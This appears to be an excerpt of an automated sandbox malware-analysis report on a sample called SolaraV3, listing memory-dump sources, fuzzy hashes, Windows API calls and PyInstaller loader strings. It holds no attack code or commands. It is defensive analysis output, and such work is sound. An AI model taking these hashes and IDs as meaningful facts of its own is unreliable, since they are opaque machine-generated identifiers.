                                                                                                                                                                                                                              • Instruction ID: 460d32da0d72202bc8947a094ec1ba4f74e5cdf43b1add80a6ff5801219bcadf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67517076A2865987E7348F2DC06033C27A1EB45B58F246132DE4D9B7A4DF3AE963C740
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction ID: 522d1fe2cf9d4e48aa28fbe6423c38137956548796d3fd7baccdd0ff6811c535
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8241AF62C2D74E05E9ED891C05296BC26809F22BA0D5833BADDDD9B3C7CD0DA5BBC200
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                              • Instruction ID: fa3d032f7b30805cc50ba6b29d375472940dc56853718c6a60417d2a5bf8498f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B41F432B14A5986EF04CF2ADA2426DA3A5BB48FD0B19A033EE1DD7B54DE3CC0538700
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction ID: 570b298ed4a54bbcdf984833dfccb9670d031f132ca8d639b673e3d032a6172a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C431F632B08B4641E7649F29645017EBAD5AF84BE0F15523EEA8D93BD5DF3CD0238704
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                              • Instruction ID: 5ce8e2659a08866ac0f258aa527b95f3553aa5dbaea72da42ea8d077d4d66c0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F044727182998ADBA88F69A40262977D1F708380F40803AD58DC3A04DE3C90628F04
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                              • Instruction ID: b2291005c026e0ffcc1c7b8ac215d75bfc08eb5359ccbd19790d8c05acd79649
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6A00231D0CE0ED4E6588B01E8A003DA370FB68300B80403BF00ED10B0EF3DA426E300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705840
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705852
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705889
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70589B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058B4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058C6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058DF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7058F1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70590D
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70591F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70593B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70594D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705969
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC70597B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC705997
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059A9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059C5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC7064CF,?,00007FF6DC70336E), ref: 00007FF6DC7059D7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction ID: 5bd0f72d8adc669c3cb0b94db63bc82d810b916f619e63c21d10af3535aa785f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5322B364A0DB0F96FE659B56A86057CA3B0FF18781F545037C81F822A0EF3DB16B9348
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6DC7086B7,?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70822C
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                              • Instruction ID: 2eb6479a9e5064bf511a11b16d31ba874cc6cf6a2ae0b124b8b744b0db849820
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351D711B2DA4A81FB619B26D8612FEA270EF94780F444537DA4EC26D5EE3DE027D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: 6bb560890a1063760ff1b2432fb7f93ef47802c76cb82598edb2bfde7034b5c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3351E736608BA186D6349F26E4581BEB7A1F798B61F004126EFDF83694DF3CD056DB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction ID: 7c585f7a559c15c08ef608bd35c4c35b0554370b399aff796e7cc0c8dafb2a4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7821A921B08A4AC5E7518B7AE85417DA260FF88BD0F584236DE2EC33D5DE2CD5729301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: 79a2cfecd9b28d38432b09fcbaf9c1260cb1a056df2b58ef13de02e89872d42e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E12B572E0C24B86FB205E9DD1646BD76A2FB50750F886137E699876C4DF3CE5A2CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 2eddba98cd7bd985834afa704490bf71776279aa41a4f794b1605193a7537f9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC12A661E1C58B87FB205E19E06427D76A5FB40754FD46033D69A8BAC8DF3CE5A2CB10
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: b26e2704b55541f584d7242c8d80862a6cabd1b7332d96b23be924faef1d69f3
                                                                                                                                                                                                                              • Instruction ID: 128a8c90c54ff631be9942f03b8e5c3482cad9073ef72b4757f9ec0ea8ccb4c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b26e2704b55541f584d7242c8d80862a6cabd1b7332d96b23be924faef1d69f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4641CE22B0865A86EA14DB17A8106BEA3A5FF44BC4F844433ED4DC778ADE3DE563D340
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: e8620759fa4b547739b0f8e1c557d5449f59716195cde5e5a3d05c06c09f61fe
                                                                                                                                                                                                                              • Instruction ID: b9ba899871d3670b54bf3b53ad20f490e73dd59220c7877a26ded39d0d834774
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8620759fa4b547739b0f8e1c557d5449f59716195cde5e5a3d05c06c09f61fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41A132B0864A8AEB11DB22D4505BDA3A0FF44794F445533ED4E8BB99DE3DE563D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
